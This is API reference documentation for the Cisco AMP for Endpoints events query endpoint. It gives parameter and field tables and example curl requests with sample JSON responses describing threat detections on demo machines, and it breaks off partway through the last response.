Cisco AMP for Endpoints API

GET /v1/events

Description

This is a general query interface for events. This is analogous to the Events view on the FireAMP Console.

Events can be filtered by a variety of criteria. Each criteria type is logically ANDed with the other criteria; each selection of a criteria is logically ORed. For example: with the query string: connector_guid[]=ead39d47-93bd-4230-b692-454b433faf96&event_type[]=2164260868&event_type[]=1090519054, it will return any events that match the connector guid ad39d47-93bd-4230-b692-454b433faf96 AND any events with type (1090519054 OR 2164260868).

The arguments passed to the event_type and group_guid parameters can be retrieved from their respective endpoints.

Query Parameters

Name Type Example Values Description
limit Integer 2, 1, 10
detection_sha256 String f8a6a244138cb1e2f044f63f3dc42beeb555da892bbd7a121274498cbdfc9ad5
application_sha256 String 80ef843fa78c33b511394a9c7535a9cbace1deb2270e86ee4ad2faffa5b1e7d2
connector_guid[] GUID af73d9d5-ddc5-4c93-9c6d-d5e6b5c5eb01
group_guid[] GUID b077d6bc-bbdf-42f7-8838-a06053fbd98a
start_date String (Time ISO8601) 2015-10-01T00:00:00+00:00 Inclusive (The list will include events that match start_date)
offset Integer 10
event_type[] Array 1090519054, 1090519084

Show Response Fields

Name Type Description
version String
metadata.links.self String
metadata.links.prev String
metadata.links.next String
metadata.results.total Integer
metadata.results.current_item_count Integer
metadata.results.index Integer
metadata.results.items_per_page Integer
data Array
data[].id Integer
data[].timestamp Integer
data[].timestamp_nanoseconds Integer
data[].date String (Time ISO8601)
data[].event_type String
data[].event_type_id Integer
data[].detection String
data[].detection_id String
data[].group_guids Array
data[].group_guids[] GUID
data[].computer.connector_guid GUID
data[].computer.hostname String
data[].computer.external_ip String
data[].computer.user String
data[].computer.active Boolean
data[].computer.network_addresses Array
data[].computer.network_addresses[].ip String
data[].computer.network_addresses[].mac String
data[].computer.links.computer String
data[].computer.links.trajectory String
data[].computer.links.group String
data[].file.disposition String
data[].file.file_name String
data[].file.file_path String
data[].file.identity.sha256 String
data[].file.identity.sha1 String
data[].file.identity.md5 String
data[].file.parent.process_id Integer
data[].file.parent.disposition String
data[].file.parent.file_name String
data[].file.parent.identity.sha256 String
data[].file.parent.identity.sha1 String
data[].file.parent.identity.md5 String
data[].scan.description String
Write
Preview
Auto Generate

Examples

Fetch list of events filtered by detection_sha256
Fetch list of events filtered by application_sha256
Fetch list of events sorted in descending order by timestamp
Fetch list of events filtered by connector_guid
Fetch list of events filtered by group_guid
Fetch list of events filtered by detection_sha256 and application_sha256
Fetch list of events filtered by event_type
Fetch list of Behavioral Protection Detection events
Fetch events that are newer than a given timestamp
Fetch list of events filtered by SCAN_STARTED event type

Fetch list of events filtered by detection_sha256

Request

Requires Authorization 
GET /v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&limit=1
Headers
accept: application/json
content-type: application/json
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&limit=1'

Response

Shortened for readability 

strict-transport-security: max-age=31536000
content-type: application/json; charset=utf-8
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 3542
x-ratelimit-remaining: 2933
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2020-02-20T19:42:33Z
transfer-encoding: chunked

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&limit=1",
      "next": "https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&limit=1&offset=1"
    },
    "results": {
      "total": 4,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1582222838,
      "timestamp_nanoseconds": 279000000,
      "date": "2020-02-20T18:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
      "group_guids": [
        "6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
        "hostname": "Demo_Upatre",
        "external_ip": "69.226.122.127",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "230.122.135.241",
            "mac": "3f:1e:b2:28:25:24"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by application_sha256

Request

Requires Authorization 
GET /v1/events?application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'

Response

Shortened for readability 

strict-transport-security: max-age=31536000
content-type: application/json; charset=utf-8
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 3540
x-ratelimit-remaining: 2932
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2020-02-20T19:42:33Z
transfer-encoding: chunked

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
      "next": "https://api.eu.amp.cisco.com/v1/events?application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
    },
    "results": {
      "total": 28,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1582222838,
      "timestamp_nanoseconds": 279000000,
      "date": "2020-02-20T18:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
      "group_guids": [
        "6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
        "hostname": "Demo_Upatre",
        "external_ip": "69.226.122.127",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "230.122.135.241",
            "mac": "3f:1e:b2:28:25:24"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events sorted in descending order by timestamp

Request

Requires Authorization 
GET /v1/events?limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?limit=2'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 881
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2817
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"e47c5ee591a19d3d79df5f425f3c56df"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?limit=2",
      "next": "https://api.eu.amp.cisco.com/v1/events?limit=2&offset=2"
    },
    "results": {
      "total": 1165,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1647602438,
      "timestamp_nanoseconds": 279000000,
      "date": "2022-03-18T11:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
        "hostname": "Demo_Upatre",
        "external_ip": "167.151.184.100",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "72.89.178.75",
            "mac": "60:60:24:d4:97:1c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    },
    {
      "id": 6180351977805840000,
      "timestamp": 1647602406,
      "timestamp_nanoseconds": 548000000,
      "date": "2022-03-18T11:20:06+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180351977805840385",
      "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
        "hostname": "Demo_Upatre",
        "external_ip": "167.151.184.100",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "72.89.178.75",
            "mac": "60:60:24:d4:97:1c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of events filtered by connector_guid

Request

Requires Authorization 
GET /v1/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 880
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2816
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"7d10304769fb11a5bbaa3eb1b69ed192"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1",
      "next": "https://api.eu.amp.cisco.com/v1/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1&offset=1"
    },
    "results": {
      "total": 34,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1647602438,
      "timestamp_nanoseconds": 279000000,
      "date": "2022-03-18T11:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
        "hostname": "Demo_Upatre",
        "external_ip": "167.151.184.100",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "72.89.178.75",
            "mac": "60:60:24:d4:97:1c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of events filtered by group_guid

Request

Requires Authorization 
GET /v1/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 879
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2815
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"79a49c2d09903d81d13c20641e21ecff"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1",
      "next": "https://api.eu.amp.cisco.com/v1/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1&offset=1"
    },
    "results": {
      "total": 279,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1647602438,
      "timestamp_nanoseconds": 279000000,
      "date": "2022-03-18T11:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
        "hostname": "Demo_Upatre",
        "external_ip": "167.151.184.100",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "72.89.178.75",
            "mac": "60:60:24:d4:97:1c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of events filtered by detection_sha256 and application_sha256

Request

Requires Authorization 
GET /v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 878
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2814
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"001a65d660ff7924ea0ef8cbff0a5dca"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
      "next": "https://api.eu.amp.cisco.com/v1/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
    },
    "results": {
      "total": 2,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1647602438,
      "timestamp_nanoseconds": 279000000,
      "date": "2022-03-18T11:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "538738f5-3a14-4449-933b-86142553de06",
        "hostname": "Demo_Upatre",
        "external_ip": "167.151.184.100",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "72.89.178.75",
            "mac": "60:60:24:d4:97:1c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of events filtered by event_type

Request

Requires Authorization 
GET /v1/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 878
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2813
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"b5bf85046d6759e6a3ca5b6f5a834e1c"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=20"
    },
    "results": {
      "total": 744,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1647599259,
      "timestamp_nanoseconds": 14000000,
      "date": "2022-03-18T10:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "149.20.236.110",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "237.160.117.93",
            "mac": "b9:f4:70:d0:30:68"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    },
    {
      "id": 6533671380737589000,
      "timestamp": 1647599258,
      "timestamp_nanoseconds": 605000000,
      "date": "2022-03-18T10:27:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589308",
      "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
